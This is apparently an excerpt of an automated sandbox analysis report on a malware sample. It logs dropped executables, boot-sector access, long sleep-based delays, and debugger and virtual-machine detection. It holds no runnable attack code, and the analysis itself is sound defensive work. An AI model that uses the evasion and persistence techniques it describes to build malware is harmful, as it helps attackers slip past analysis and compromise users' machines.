            Source: file.exeStatic PE information: section name: .wujep
            Source: file.exeStatic PE information: section name: .jin
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsa_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsb_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsc_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsd_4
            Source: is-28G11.tmp.3.drStatic PE information: section name: Shared
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /4
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /19
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /35
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /51
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /63
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /77
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /89
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /102
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /113
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /124
            Source: sqlite3.dll.6.drStatic PE information: section name: /4
            Source: sqlite3.dll.6.drStatic PE information: section name: /19
            Source: sqlite3.dll.6.drStatic PE information: section name: /35
            Source: sqlite3.dll.6.drStatic PE information: section name: /51
            Source: sqlite3.dll.6.drStatic PE information: section name: /63
            Source: sqlite3.dll.6.drStatic PE information: section name: /77
            Source: sqlite3.dll.6.drStatic PE information: section name: /89
            Source: sqlite3.dll.6.drStatic PE information: section name: /102
            Source: sqlite3.dll.6.drStatic PE information: section name: /113
            Source: sqlite3.dll.6.drStatic PE information: section name: /124
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsa_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsb_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsc_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsd_4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406795 push ecx; ret 0_2_004067A8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A0AF push esi; retf 0_2_0056A0BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B165 push edi; retf 0_2_0056B166
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B187 push esi; retf 0_2_0056B188
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B6FE pushad ; ret 0_2_0056B6FF
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056D34D push ds; ret 0_2_0056D358
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A3B4 push ebx; iretd 0_2_0056A3B7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006470D6 push esp; retf 0_2_006470D7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063397B push dword ptr [edi+03h]; retf 0_2_00633981
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646AD8 push esp; retf 0_2_00646AE0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063AB57 push ecx; ret 0_2_0063AB6A
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004065B8 push 004065F5h; ret 2_2_004065ED
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004040B5 push eax; ret 2_2_004040F1
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00408104 push ecx; mov dword ptr [esp], eax2_2_00408109
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404185 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404206 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_0040C218 push eax; ret 2_2_0040C219
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004042E8 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404283 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00408F38 push 00408F6Bh; ret 2_2_00408F63
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040993C push 00409979h; ret 3_2_00409971
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040A037 push ds; ret 3_2_0040A038
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004941B8 push ecx; mov dword ptr [esp], ecx3_2_004941BD
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004062B4 push ecx; mov dword ptr [esp], eax3_2_004062B5
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004106C8 push ecx; mov dword ptr [esp], edx3_2_004106CD
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00412920 push 00412983h; ret 3_2_0041297B
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00484BE8 push ecx; mov dword ptr [esp], ecx3_2_00484BED
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040D020 push ecx; mov dword ptr [esp], edx3_2_0040D022
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004590F0 push 00459134h; ret 3_2_0045912C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040546D push eax; ret 3_2_004054A9
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00443438 push ecx; mov dword ptr [esp], ecx3_2_0044343C
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsa_4 entropy: 7.633010281787107
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsa_4 entropy: 7.633010281787107

            Persistence and Installation Behavior

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_00401A4F
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02E4F8A2
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeFile created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].fileJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ONE[1].fileJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\is-CUGJK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmpJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpFile created: C:\Users\user\AppData\Local\AlterGame 1.13\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].fileJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ONE[1].fileJump to dropped file

            Boot Survival

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_00401A4F
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02E4F8A2
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00423C04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00423C04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004241D4 IsIconic,SetActiveWindow,SetFocus,3_2_004241D4
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0042418C IsIconic,SetActiveWindow,3_2_0042418C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,3_2_0041837C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,3_2_00422854
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,3_2_00482EF8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417590 IsIconic,GetCapture,3_2_00417590
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417CC6 IsIconic,SetWindowPos,3_2_00417CC6
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_00417CC8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_0041F110
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeMemory allocated: 1ADC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60920C91 rdtsc 6_2_60920C91
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_00401B4B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_02E4F9A6
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\is-CUGJK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_2-5687
            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-19430
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-60846
            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-19879
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeAPI coverage: 5.5 %
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 420Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 420Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 4312Thread sleep count: 71 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe TID: 4312Thread sleep time: -4260000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe TID: 396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00452A34 FindFirstFileA,GetLastError,3_2_00452A34
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,3_2_00474D70
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00462578 FindFirstFileA,FindNextFileA,FindClose,3_2_00462578
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_004975B0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463B04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463F80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,2_2_00409B30
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeThread delayed: delay time: 60000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*k
            Source: altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-19880
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeAPI call chain: ExitProcess graph end nodegraph_2-6727
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeAPI call chain: ExitProcess graph end nodegraph_6-61046
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Found API chain indicative of debugger detection
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_6-60742
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60920C91 rdtsc 6_2_60920C91
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080BA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004080BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404530 SetLastError,SetLastError,FindNextVolumeMountPointA,EnumTimeFormatsW,_calloc,__floor_pentium4,GetDllDirectoryW,OpenJobObjectA,InterlockedExchangeAdd,VirtualAlloc,GetLastError,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,InterlockedExchange,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,OutputDebugStringW,GetUserDefaultLangID,LoadLibraryW,ReadConsoleInputA,LCMapStringA,InterlockedIncrement,LCMapStringA,InterlockedIncrement,OpenEventW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,FreeEnvironmentStringsW,GetComputerNameA,InterlockedExchange,LoadLibraryW,0_2_00404530
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C415 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040C415
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00567BE0 push dword ptr fs:[00000030h]0_2_00567BE0
